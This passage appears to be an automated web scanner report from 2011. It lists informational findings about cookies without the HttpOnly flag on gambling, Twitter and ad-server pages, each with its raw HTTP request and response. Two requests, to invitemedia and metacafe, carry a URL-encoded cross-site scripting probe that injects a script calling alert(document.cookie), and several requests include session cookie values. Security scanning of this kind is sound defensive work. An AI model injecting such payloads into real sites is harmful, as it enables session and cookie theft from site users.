Set-Cookie: UniqueVisitorID=92AFF744A8C1ACECECBEB1CBE42B4786; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:03:33 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.185. http://sv.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=azgunk45evet2e2lc4weniil; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=9F2E93BD550A418B6C8B77D320264753&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:12 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: UniqueVisitorID=9F2E93BD550A418B6C8B77D320264753; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:12 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.186. http://sv.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fndj2f45vfptvambh31xbrbd; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=2F88B34160D1FB90561B679A38A912E9&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:53 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: UniqueVisitorID=2F88B34160D1FB90561B679A38A912E9; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:53 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.187. http://sv.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: sv.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gwthtzz40d422xm4dak1bp45; path=/; HttpOnly
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:10 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: UniqueVisitorID=3B851E3B1D951D14376C41FE99F407D8; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:10 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44324


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.188. http://twitter.com/PostcodeLottery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PostcodeLottery

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PostcodeLottery HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-9250-27328
ETag: "509908394cb0e30c33cd8bdb160b0b2c"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.03576
Content-Type: text/html; charset=utf-8
Content-Length: 59180
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e61ab982b4aed01008cdec3c1c8138b280a18ccf
Set-Cookie: k=173.193.214.243.1305547124447352; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712445382826; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOYurPgvAToHaWQiJWFiMDRlMGMzNDNkYzhh%250AM2RlODFlOGM3MTY2MDI1ZDY2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b4682015a7f1885320edf06ef6f2b95fed508082; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.189. http://twitter.com/PrimeScratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /PrimeScratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PrimeScratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-38253-35739
ETag: "de9673ab5bac9a85dedd4caeafe3f4e2"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00948
Content-Type: text/html; charset=utf-8
Content-Length: 48033
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 902d2adaaadcd4c50d07311d00ce36d2fb541db9
Set-Cookie: k=173.193.214.243.1305547124198035; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712420572627; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCO4trPgvAToHaWQiJWYxODc0MTk2MjM0Mjgw%250AZDhiYTA3NjMyOGM0NzNiN2M5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--fa86eb668ddb62cafcb9697b322fc64f12da4063; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.190. http://twitter.com/crazyscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crazyscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547124-24586-58491
ETag: "d6f21384f100129309a8c66fccb1ac7d"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:44 GMT
X-Runtime: 0.00873
Content-Type: text/html; charset=utf-8
Content-Length: 47490
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: e6ed5ddb8758b31406ef9cd22c304eb256d1c6ac
Set-Cookie: k=173.193.214.243.1305547124050568; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712405667445; path=/; expires=Wed, 15 Jun 2011 11:58:44 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFotrPgvAToHaWQiJTAzZjUxZWIyNmM4ZGVi%250AMDllY2QyMDI3YjhmMWQ2M2JkIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--593c1ebfebc2e5eb6e907ba040cf743ef29a279e; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.191. http://twitter.com/ukscratch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ukscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ukscratch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305547123-20423-53593
ETag: "ab5f42b56a9a549a2367ddad1fefb082"
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 11:58:43 GMT
X-Runtime: 0.00833
Content-Type: text/html; charset=utf-8
Content-Length: 23894
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 37f116a865ccfb3e22b1c38efd73db8ddb6854e5
Set-Cookie: k=173.193.214.243.1305547123976604; path=/; expires=Mon, 23-May-11 11:58:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=130554712398340369; path=/; expires=Wed, 15 Jun 2011 11:58:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCBAtrPgvAToHaWQiJTA2ZmQ5MzM0MjQxNzI4%250ANWRmZTU4MGM2YzQ1ZjNiNWRjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a6c952001d0836b81d2cff483ca79969f1db4eaf; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

12.192. http://va.px.invitemedia.com/goog_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=4284276430058379
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 16-May-2011 12:51:49 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.193. http://winter.metacafe.com/Openx/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://winter.metacafe.com
Path:   /Openx/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Openx/www/delivery/lg.php?bannerid=10601&campaignid=5097&zoneid=263&source=;number-0;ff-on;LEID-40;pageType-home;sessions-1;header-http://www.metacafe.com;metacafe.com;playerType-Portal;public-no;userStatus=Anonymous&loc=1&referer=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1&cb=e9bcf54a47 HTTP/1.1
Host: winter.metacafe.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7ba2c139c5c43d415b4eb00c8050858e; OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; OAID=c28c03f15174f432a7be750cb01c8ecd; User=%7B%22sc%22%3A1%2C%22visitID%22%3A%2289a4d803e9538a86501013a4c90d08fa%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:29 GMT
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=c28c03f15174f432a7be750cb01c8ecd; expires=Tue, 15-May-2012 12:49:29 GMT; path=/; domain=.metacafe.com
Content-Length: 43
Vary: Accept-Encoding,User-Agent
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.194. http://www.bet365.com/extra/en/betting/in-play

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/in-play

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/betting/in-play HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:22 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:22 GMT; path=/
Set-Cookie: ASP.NET_SessionId=unylycjqefpfxs45dlzrct45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:22 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 102612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.195. http://www.bet365.com/extra/en/betting/live-streaming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/betting/live-streaming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/betting/live-streaming HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=arbxtv45ukmqrsq55mwos0iy; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 101179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.196. http://www.bet365.com/extra/en/mobile/introduction/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/mobile/introduction/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/mobile/introduction/ HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:25 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3ysuis55m3k5e4u42bup5i55; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 65383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.197. http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/horse-racing/best-odds-guaranteed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /extra/en/promotions/horse-racing/best-odds-guaranteed HTTP/1.1
Host: www.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D11AA414789D6755EE19B7B33000002; rmbs=2; stk=F2905C3D11AA414789D6755EE19B7B33000002;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:31:26 GMT
X-AspNet-Version: 2.0.50727
Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5fxxsc45xzcdzr55sixclp45; path=/; HttpOnly
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:31:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...

12.198. http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bet365.com
Path:   /extra/en/promotions/soccer/bore-draw-money-back

Issue detail

